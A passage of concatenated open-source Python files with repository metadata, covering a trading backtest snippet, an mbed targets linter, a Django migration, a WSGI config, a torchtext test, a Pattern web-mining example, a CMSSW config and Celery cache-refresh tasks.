Dataset2[k[0]][2],Dataset2[k[0]][0])
Asset3['Pass'] = (Asset3['LogRet'] * Asset3['Position'])
Asset4['Position'] = (Dataset2[kfloat][1])
Asset4['Position'] = np.where(Asset4['SMAspread'].shift(1) > threshold,
Dataset2[k[0]][3],Dataset2[k[0]][1])
Asset4['Pass'] = (Asset4['LogRet'] * Asset4['Position'])
#
Portfolio2['Asset3Pass'] = Asset3['Pass'] #* (-1)
Portfolio2['Asset4Pass'] = Asset4['Pass'] #* (-1)
Portfolio2['LongShort'] = Portfolio2['Asset3Pass'] + Portfolio2['Asset4Pass']
Portfolio2['LongShort'][:].cumsum().apply(np.exp).plot(grid=True,
figsize=(8,5))
dailyreturn = Portfolio2['LongShort'].mean()
dailyvol = Portfolio2['LongShort'].std()
sharpe =(dailyreturn/dailyvol)
Portfolio2['Multiplier'] = Portfolio2['LongShort'].cumsum().apply(np.exp)
drawdown2 = 1 - Portfolio2['Multiplier'].div(Portfolio2['Multiplier'].cummax())
#conversionfactor = Portfolio['PriceRelative'][-1]
print(kfloat)
print('--------')
print(Dataset2[kfloat])
print('Max Drawdown is ',max(drawdown2),'See Dataset2')
##pd.to_pickle(Portfolio, 'VXX:UVXY')
|
adamrvfisher/TechnicalAnalysisLibrary
|
SpeedDaterSMAspread.py
|
Python
|
apache-2.0
| 9,366
|
"""A linting utility for targets.json
This linting utility may be called as follows:
python <path-to>/lint.py targets TARGET [TARGET ...]
all targets will be linted
"""
# mbed SDK
# Copyright (c) 2017 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from os.path import join, abspath, dirname
if __name__ == "__main__":
import sys
ROOT = abspath(join(dirname(__file__), "..", ".."))
sys.path.insert(0, ROOT)
from copy import copy
from yaml import dump_all
import argparse
from tools.targets import Target, set_targets_json_location, TARGET_MAP
def must_have_keys(keys, dict):
"""Require keys in an MCU/Board
is a generator for errors
"""
for key in keys:
if key not in dict:
yield "%s not found, and is required" % key
def may_have_keys(keys, dict):
"""Disable all other keys in an MCU/Board
is a generator for errors
"""
for key in dict.keys():
if key not in keys:
yield "%s found, and is not allowed" % key
def check_extra_labels(dict):
"""Check that extra_labels does not contain any Target names
is a generator for errors
"""
for label in (dict.get("extra_labels", []) +
dict.get("extra_labels_add", [])):
if label in Target.get_json_target_data():
yield "%s is not allowed in extra_labels" % label
def check_release_version(dict):
"""Verify that release version 5 is combined with support for all toolcahins
is a generator for errors
"""
if ("release_versions" in dict and
"5" in dict["release_versions"] and
"supported_toolchains" in dict):
for toolc in ["GCC_ARM", "ARM", "IAR"]:
if toolc not in dict["supported_toolchains"]:
yield ("%s not found in supported_toolchains, and is "
"required by mbed OS 5" % toolc)
def check_inherits(dict):
if ("inherits" in dict and len(dict["inherits"]) > 1):
yield "multiple inheritance is forbidden"
DEVICE_HAS_ALLOWED = ["ANALOGIN", "ANALOGOUT", "CAN", "ETHERNET", "EMAC",
"FLASH", "I2C", "I2CSLAVE", "I2C_ASYNCH", "INTERRUPTIN",
"LPTICKER", "PORTIN", "PORTINOUT", "PORTOUT",
"PWMOUT", "RTC", "TRNG","SERIAL", "SERIAL_ASYNCH",
"SERIAL_FC", "SLEEP", "SPI", "SPI_ASYNCH", "SPISLAVE",
"STORAGE", "STCLK_OFF_DURING_SLEEP"]
def check_device_has(dict):
for name in dict.get("device_has", []):
if name not in DEVICE_HAS_ALLOWED:
yield "%s is not allowed in device_has" % name
MCU_REQUIRED_KEYS = ["release_versions", "supported_toolchains",
"default_lib", "public", "inherits", "device_has"]
MCU_ALLOWED_KEYS = ["device_has_add", "device_has_remove", "core",
"extra_labels", "features", "features_add",
"features_remove", "bootloader_supported", "device_name",
"post_binary_hook", "default_toolchain", "config",
"extra_labels_add", "extra_labels_remove",
"target_overrides"] + MCU_REQUIRED_KEYS
def check_mcu(mcu_json, strict=False):
"""Generate a list of problems with an MCU
:param: mcu_json the MCU's dict to check
:param: strict enforce required keys
"""
errors = list(may_have_keys(MCU_ALLOWED_KEYS, mcu_json))
if strict:
errors.extend(must_have_keys(MCU_REQUIRED_KEYS, mcu_json))
errors.extend(check_extra_labels(mcu_json))
errors.extend(check_release_version(mcu_json))
errors.extend(check_inherits(mcu_json))
errors.extend(check_device_has(mcu_json))
if 'public' in mcu_json and mcu_json['public']:
errors.append("public must be false")
return errors
BOARD_REQUIRED_KEYS = ["inherits"]
BOARD_ALLOWED_KEYS = ["supported_form_factors", "is_disk_virtual",
"detect_code", "extra_labels", "extra_labels_add",
"extra_labels_remove", "public", "config",
"forced_reset_timeout", "target_overrides"] + BOARD_REQUIRED_KEYS
def check_board(board_json, strict=False):
"""Generate a list of problems with an board
:param: board_json the mcus dict to check
:param: strict enforce required keys
"""
errors = list(may_have_keys(BOARD_ALLOWED_KEYS, board_json))
if strict:
errors.extend(must_have_keys(BOARD_REQUIRED_KEYS, board_json))
errors.extend(check_extra_labels(board_json))
errors.extend(check_inherits(board_json))
return errors
def add_if(dict, key, val):
"""Add a value to a dict if it's non-empty"""
if val:
dict[key] = val
def _split_boards(resolution_order, tgt):
"""Split the resolution order between boards and mcus"""
mcus = []
boards = []
iterable = iter(resolution_order)
for name in iterable:
mcu_json = tgt.json_data[name]
if (len(list(check_mcu(mcu_json, True))) >
len(list(check_board(mcu_json, True)))):
boards.append(name)
else:
mcus.append(name)
break
mcus.extend(iterable)
mcus.reverse()
boards.reverse()
return mcus, boards
MCU_FORMAT_STRING = {1: "MCU (%s) ->",
2: "Family (%s) -> MCU (%s) ->",
3: "Family (%s) -> SubFamily (%s) -> MCU (%s) ->"}
BOARD_FORMAT_STRING = {1: "Board (%s)",
2: "Module (%s) -> Board (%s)"}
def _generate_hierarchy_string(mcus, boards):
global_errors = []
if len(mcus) < 1:
global_errors.append("No MCUS found in hierarchy")
mcus_string = "??? ->"
elif len(mcus) > 3:
global_errors.append("No name for targets %s" % ", ".join(mcus[3:]))
mcus_string = MCU_FORMAT_STRING[3] % tuple(mcus[:3])
for name in mcus[3:]:
mcus_string += " ??? (%s) ->" % name
else:
mcus_string = MCU_FORMAT_STRING[len(mcus)] % tuple(mcus)
if len(boards) < 1:
global_errors.append("no boards found in hierarchy")
boards_string = "???"
elif len(boards) > 2:
global_errors.append("no name for targets %s" % ", ".join(boards[2:]))
boards_string = BOARD_FORMAT_STRING[2] % tuple(boards[:2])
for name in boards[2:]:
boards_string += " -> ??? (%s)" % name
else:
boards_string = BOARD_FORMAT_STRING[len(boards)] % tuple(boards)
return mcus_string + " " + boards_string, global_errors
def check_hierarchy(tgt):
"""Atempts to assign labels to the hierarchy"""
resolution_order = copy(tgt.resolution_order_names[:-1])
mcus, boards = _split_boards(resolution_order, tgt)
target_errors = {}
hierachy_string, hierachy_errors = _generate_hierarchy_string(mcus, boards)
to_ret = {"hierarchy": hierachy_string}
add_if(to_ret, "hierarchy errors", hierachy_errors)
for name in mcus[:-1]:
add_if(target_errors, name, list(check_mcu(tgt.json_data[name])))
if len(mcus) >= 1:
add_if(target_errors, mcus[-1],
list(check_mcu(tgt.json_data[mcus[-1]], True)))
for name in boards:
add_if(target_errors, name, list(check_board(tgt.json_data[name])))
if len(boards) >= 1:
add_if(target_errors, boards[-1],
list(check_board(tgt.json_data[boards[-1]], True)))
add_if(to_ret, "target errors", target_errors)
return to_ret
PARSER = argparse.ArgumentParser(prog="targets/lint.py")
SUBPARSERS = PARSER.add_subparsers(title="Commands")
def subcommand(name, *args, **kwargs):
def __subcommand(command):
kwargs['description'] = command.__doc__
subparser = SUBPARSERS.add_parser(name, **kwargs)
for arg in args:
arg = dict(arg)
opt = arg['name']
del arg['name']
if isinstance(opt, basestring):
subparser.add_argument(opt, **arg)
else:
subparser.add_argument(*opt, **arg)
def _thunk(parsed_args):
argv = [arg['dest'] if 'dest' in arg else arg['name']
for arg in args]
argv = [(arg if isinstance(arg, basestring)
else arg[-1]).strip('-').replace('-', '_')
for arg in argv]
argv = {arg: vars(parsed_args)[arg] for arg in argv
if vars(parsed_args)[arg] is not None}
return command(**argv)
subparser.set_defaults(command=_thunk)
return command
return __subcommand
@subcommand("targets",
dict(name="mcus", nargs="+", metavar="MCU",
choices=TARGET_MAP.keys(), type=str.upper))
def targets_cmd(mcus=[]):
"""Find and print errors about specific targets"""
print dump_all([check_hierarchy(TARGET_MAP[m]) for m in mcus],
default_flow_style=False)
@subcommand("all-targets")
def all_targets_cmd():
"""Print all errors about all parts"""
print dump_all([check_hierarchy(m) for m in TARGET_MAP.values()],
default_flow_style=False)
@subcommand("orphans")
def orphans_cmd():
"""Find and print all orphan targets"""
orphans = Target.get_json_target_data().keys()
for tgt in TARGET_MAP.values():
for name in tgt.resolution_order_names:
if name in orphans:
orphans.remove(name)
if orphans:
print dump_all([orphans], default_flow_style=False)
return len(orphans)
def main():
"""entry point"""
options = PARSER.parse_args()
return options.command(options)
if __name__ == "__main__":
sys.exit(main())
|
betzw/mbed-os
|
tools/targets/lint.py
|
Python
|
apache-2.0
| 10,114
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Visit.service'
db.alter_column(u'clinics_visit', 'service_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['clinics.Service'], null=True))
def backwards(self, orm):
# Changing field 'Visit.service'
db.alter_column(u'clinics_visit', 'service_id', self.gf('django.db.models.fields.related.ForeignKey')(default=0, to=orm['clinics.Service']))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'clinics.clinic': {
'Meta': {'object_name': 'Clinic'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'code': ('django.db.models.fields.PositiveIntegerField', [], {'unique': 'True'}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['rapidsms.Contact']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_renovated': ('django.db.models.fields.CharField', [], {'max_length': '4', 'blank': 'True'}),
'lga': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'lga_rank': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'pbf_rank': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'town': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'ward': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'year_opened': ('django.db.models.fields.CharField', [], {'max_length': '4', 'blank': 'True'})
},
u'clinics.clinicstaff': {
'Meta': {'object_name': 'ClinicStaff'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['clinics.Clinic']"}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['rapidsms.Contact']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_manager': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'staff_type': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'year_started': ('django.db.models.fields.CharField', [], {'max_length': '4', 'blank': 'True'})
},
u'clinics.clinicstatistic': {
'Meta': {'unique_together': "[('clinic', 'statistic', 'month')]", 'object_name': 'ClinicStatistic'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['clinics.Clinic']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'float_value': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'int_value': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'month': ('django.db.models.fields.DateField', [], {}),
'rank': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'statistic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['statistics.Statistic']"}),
'text_value': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'clinics.patient': {
'Meta': {'object_name': 'Patient'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['clinics.Clinic']"}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['rapidsms.Contact']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mobile': ('django.db.models.fields.CharField', [], {'max_length': '11', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'serial': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'clinics.region': {
'Meta': {'unique_together': "(('external_id', 'type'),)", 'object_name': 'Region'},
'alternate_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'boundary': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {}),
'external_id': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'lga'", 'max_length': '16'})
},
u'clinics.service': {
'Meta': {'object_name': 'Service'},
'code': ('django.db.models.fields.PositiveIntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
u'clinics.visit': {
'Meta': {'object_name': 'Visit'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'patient': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['clinics.Patient']"}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['clinics.Service']", 'null': 'True', 'blank': 'True'}),
'staff': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['clinics.ClinicStaff']", 'null': 'True', 'blank': 'True'}),
'visit_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
u'clinics.visitregistrationerror': {
'Meta': {'object_name': 'VisitRegistrationError'},
'error_count': ('django.db.models.fields.PositiveIntegerField', [], {}),
'error_type': ('django.db.models.fields.PositiveIntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sender': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
u'clinics.visitregistrationerrorlog': {
'Meta': {'object_name': 'VisitRegistrationErrorLog'},
'error_type': ('django.db.models.fields.PositiveIntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '160'}),
'message_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'sender': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'rapidsms.contact': {
'Meta': {'object_name': 'Contact'},
'created_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '6', 'blank': 'True'}),
'modified_on': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
u'statistics.statistic': {
'Meta': {'object_name': 'Statistic'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['statistics.StatisticGroup']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'statistic_type': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
u'statistics.statisticgroup': {
'Meta': {'object_name': 'StatisticGroup'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
}
}
complete_apps = ['clinics']
|
myvoice-nigeria/myvoice
|
myvoice/clinics/migrations/0013_auto__chg_field_visit_service.py
|
Python
|
bsd-2-clause
| 13,197
|
"""
WSGI config for parker project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "parker.settings")
application = get_wsgi_application()
|
banacer/parker.io
|
parker/parker/wsgi.py
|
Python
|
mit
| 389
|
import unittest
from torchtext.data.metrics import bleu_score
class TestTorchtext(unittest.TestCase):
def test_bleu_score(self):
candidate = [['I', 'love', 'Kaggle', 'Notebooks']]
refs = [[['Completely', 'Different']]]
self.assertEqual(0, bleu_score(candidate, refs))
|
Kaggle/docker-python
|
tests/test_torchtext.py
|
Python
|
apache-2.0
| 301
|
import os, sys; sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", ".."))
from pattern.web import Bing, plaintext
from pattern.en import parsetree
from pattern.search import Pattern
from pattern.db import Datasheet, pprint
# "X IS MORE IMPORTANT THAN Y"
# Here is a rough example of how to build a web miner.
# It mines comparative statements from Bing and stores the results in a table,
# which can be saved as a text file for further processing later on.
# Pattern matching also works with Sentence objects from the MBSP module.
# MBSP's parser is much more robust (but also slower).
#from MBSP import Sentence, parse
q = '"more important than"' # Bing search query
p = "NP VP? more important than NP" # Search pattern.
p = Pattern.fromstring(p)
d = Datasheet()
engine = Bing(license=None)
for i in range(1): # max=10
for result in engine.search(q, start=i+1, count=100, cached=True):
s = result.description
s = plaintext(s)
t = parsetree(s)
for m in p.search(t):
a = m.constituents(constraint=0)[-1] # Left NP.
b = m.constituents(constraint=5)[ 0] # Right NP.
d.append((
a.string.lower(),
b.string.lower()))
pprint(d)
print
print len(d), "results."
|
krishna11888/ai
|
third_party/pattern/examples/04-search/09-web.py
|
Python
|
gpl-2.0
| 1,296
|
import FWCore.ParameterSet.Config as cms
process = cms.Process('slim')
process.source = cms.Source("PoolSource", fileNames=cms.untracked.vstring())
process.maxEvents = cms.untracked.PSet(input=cms.untracked.int32(10))
process.output = cms.OutputModule("PoolOutputModule",
outputCommands=cms.untracked.vstring(
"drop *", "keep recoTracks_*_*_*"),
fileName=cms.untracked.string('output.root'),
)
process.out = cms.EndPath(process.output)
|
matz-e/lobster
|
examples/simple_pset.py
|
Python
|
mit
| 579
|
__author__ = 'M@Campbell'
from ooiservices.app import create_celery_app
from ooiservices.app.main.c2 import _compile_c2_toc
from flask.globals import current_app
import requests
from flask.ext.cache import Cache
CACHE_TIMEOUT = 172800
'''
Create the celery app, and configure it to talk to the redis broker.
Then initialize it.
'''
celery = create_celery_app('PRODUCTION')
celery.config_from_object('ooiservices.app.celeryconfig')
"""
Define the list of processes to run either on a heartbeat or simply waiting for
Caches created/utilized:
asset_list
asset_rds
c2_toc
stream_list
event_list
glider_tracks
cam_images
bad_asset_list
vocab_dict
vocab_codes
"""
from ooiservices.app.uframe.assetController import _compile_assets, _compile_bad_assets
from ooiservices.app.uframe.assetController import _compile_events
from ooiservices.app.uframe.controller import dfs_streams
from ooiservices.app.uframe.controller import _compile_glider_tracks
from ooiservices.app.uframe.controller import _compile_cam_images
from ooiservices.app.uframe.controller import _compile_large_format_files
from ooiservices.app.uframe.vocab import _compile_vocab
from ooiservices.app.main.alertsalarms_tools import _compile_asset_rds, get_assets_dict_from_list
@celery.task(name='tasks.compile_assets')
def compile_assets():
try:
print '\n debug - *** tasks - compile_assets()'
with current_app.test_request_context():
print "[+] Starting asset cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
url = current_app.config['UFRAME_ASSETS_URL'] + '/%s' % ('assets')
payload = requests.get(url)
if payload.status_code is 200:
# Cache assets_list
data = payload.json()
assets, asset_rds = _compile_assets(data)
if "error" not in assets:
cache.set('asset_list', assets, timeout=CACHE_TIMEOUT)
print "[+] Asset list cache reset"
# Cache assets_dict (based on success of _compile_assets returning assets)
assets_dict = get_assets_dict_from_list(assets)
if not assets_dict:
message = 'Warning: get_assets_dict_from_list returned empty assets_dict.'
print '\n debug -- message: ', message
current_app.logger.info(message)
if isinstance(assets_dict, dict):
cache.set('assets_dict', assets_dict, timeout=CACHE_TIMEOUT)
print "[+] Assets dictionary cache reset"
else:
print "[-] Error in Assets dictionary cache update"
else:
print "[-] Error in asset_list and asset_dict cache update"
# Cache assets_rd
if asset_rds:
cache.set('asset_rds', asset_rds, timeout=CACHE_TIMEOUT)
print "[+] Asset reference designators cache reset..."
else:
print "[-] Error in asset_rds cache update"
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_assets exception: %s' % err.message
current_app.logger.warning(message)
raise Exception(message)
@celery.task(name='tasks.compile_asset_rds')
def compile_assets_rd():
try:
asset_rds = {}
with current_app.test_request_context():
print "[+] Starting asset reference designators cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
try:
asset_rds, _ = _compile_asset_rds()
except Exception as err:
message = 'Error processing _compile_asset_rds: ', err.message
current_app.logger.warning(message)
if asset_rds:
cache.set('asset_rds', asset_rds, timeout=CACHE_TIMEOUT)
print "[+] Asset reference designators cache reset..."
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_asset_rds exception: %s' % err.message
current_app.logger.warning(message)
raise Exception(message)
@celery.task(name='tasks.compile_streams')
def compile_streams():
try:
with current_app.test_request_context():
print "[+] Starting stream cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
streams = dfs_streams()
if "error" not in streams:
cache.set('stream_list', streams, timeout=CACHE_TIMEOUT)
print "[+] Streams cache reset."
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_streams exception: %s' % err.message
current_app.logger.warning(message)
@celery.task(name='tasks.compile_events')
def compile_events():
try:
with current_app.test_request_context():
print "[+] Starting events cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
url = current_app.config['UFRAME_ASSETS_URL'] + '/events'
payload = requests.get(url)
if payload.status_code is 200:
data = payload.json()
events = _compile_events(data)
if "error" not in events:
cache.set('event_list', events, timeout=CACHE_TIMEOUT)
print "[+] Events cache reset."
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_cam_images exception: %s' % err.message
current_app.logger.warning(message)
@celery.task(name='tasks.compile_glider_tracks')
def compile_glider_tracks():
try:
with current_app.test_request_context():
print "[+] Starting glider tracks cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
glider_tracks = _compile_glider_tracks(True)
if "error" not in glider_tracks:
cache.set('glider_tracks', glider_tracks, timeout=CACHE_TIMEOUT)
print "[+] Glider tracks cache reset."
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_glider_tracks exception: %s' % err.message
current_app.logger.warning(message)
@celery.task(name='tasks.compile_cam_images')
def compile_cam_images():
try:
with current_app.test_request_context():
print "[+] Starting cam images cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
cam_images = _compile_cam_images()
if "error" not in cam_images:
cache.set('cam_images', cam_images, timeout=CACHE_TIMEOUT)
print "[+] cam images cache reset."
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_cam_images exception: %s' % err.message
current_app.logger.warning(message)
"""
'get-large-format-files-every': {
'task': 'tasks.compile_large_format_files',
'schedule': crontab(minute=0, hour='*/12'),
'args': (),
},
"""
@celery.task(name='tasks.compile_large_format_files')
def compile_large_format_files():
try:
with current_app.test_request_context():
print "[+] Starting large format file cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
data = _compile_large_format_files()
if "error" not in data:
cache.set('large_format', data, timeout=CACHE_TIMEOUT)
print "[+] large format files updated."
else:
print "[-] Error in large file format update"
except Exception as err:
message = 'compile_large_format_files exception: %s' % err.message
current_app.logger.warning(message)
@celery.task(name='tasks.compile_c2_toc')
def compile_c2_toc():
try:
c2_toc = {}
with current_app.test_request_context():
print "[+] Starting c2 toc cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
try:
c2_toc = _compile_c2_toc()
except Exception as err:
message = 'Error processing compile_c2_toc: ', err.message
current_app.logger.warning(message)
if c2_toc is not None:
cache.set('c2_toc', c2_toc, timeout=CACHE_TIMEOUT)
print "[+] C2 toc cache reset..."
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_c2_toc exception: ', err.message
current_app.logger.warning(message)
@celery.task(name='tasks.compile_bad_assets')
def compile_bad_assets():
try:
with current_app.test_request_context():
print "[+] Starting bad asset cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
url = current_app.config['UFRAME_ASSETS_URL'] + '/assets'
payload = requests.get(url)
if payload.status_code is 200:
data = payload.json()
bad_assets = _compile_bad_assets(data)
if "error" not in bad_assets:
cache.set('bad_asset_list', bad_assets, timeout=CACHE_TIMEOUT)
print "[+] Bad asset cache reset"
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_bad_assets exception: %s' % err.message
current_app.logger.warning(message)
@celery.task(name='tasks.compile_vocabulary')
def compile_vocabulary():
try:
with current_app.test_request_context():
print "[+] Starting vocabulary cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
url = current_app.config['UFRAME_VOCAB_URL'] + '/vocab'
payload = requests.get(url)
if payload.status_code is 200:
data = payload.json()
